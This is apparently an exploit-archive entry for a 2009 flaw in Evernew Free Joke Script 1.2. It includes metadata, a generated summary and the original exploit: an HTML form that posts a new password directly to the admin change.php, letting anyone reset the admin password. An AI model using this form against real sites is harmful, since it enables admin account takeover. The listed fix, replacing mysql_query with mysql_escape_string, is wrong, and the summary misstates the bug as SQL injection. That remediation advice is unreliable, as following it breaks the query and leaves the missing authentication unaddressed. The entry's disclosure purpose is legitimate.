Evernew Free Joke Script 1.2 => Remote Change Password

vendor:

Free Joke Script

by:

Hakxer

7,5

CVSS

HIGH

Remote Change Password

CWE

Product Name: Free Joke Script

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: YES

Related CWE: N/A

CPE: a:evernew:free_joke_script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Evernew Free Joke Script 1.2 => Remote Change Password

A vulnerability exists in Evernew Free Joke Script 1.2 which allows an attacker to remotely change the password of the admin. This is due to the lack of input validation in the change.php file in line 10, where the $result variable is set to mysql_query without any input validation. This can be exploited to inject malicious SQL commands which can be used to change the password of the admin.

Mitigation:

The issue can be mitigated by using mysql_escape_string instead of mysql_query in the change.php file.

Source

Exploit-DB raw data:

<!--
  Discovered & Exploited by : Hakxer
  Evernew Free Joke Script 1.2 => Remote Change Password
 
  [=>] Bug detail
  bug in change.php file
  in line 10 :
  $result=mysql_query("update admin set password='$pass'");
 -----------------------
 
  [=>] Fix
  $result=mysql_escape_string("update admin set password='$pass'");
  change mysql_query to mysql_escape_string
 
  [=>] Greetz : ExH , ProViDoR , Error code , dody2100 , sinaritx , all my friends
!-->
<form action="http://www.site.com/script/admin/change.php" method="post" name="form1" id="form1" onSubmit="MM_validateForm('password','','R');return document.MM_returnValue">
<font class="text"><b>enter password to change it in admin :D</b></font> <br />
<br/>
<table width="305" height="106" border="0" cellpadding="5" cellspacing="0">
<tr>
<td width="103" class="text">Password : </td>
<td width="182"><div align="left">
<input name="password" type="password" class="style7" id="password" />
</div></td>
</tr>
<tr>
<td colspan="2"><div align="center">
<input name="Submit" type="submit" class="text_1" value="Change Password" />
</div></td>
</tr>
<tr>
<td colspan="2"><?php echo($msg); ?> </td>
</tr>
</table>
</form>

# milw0rm.com [2009-06-15]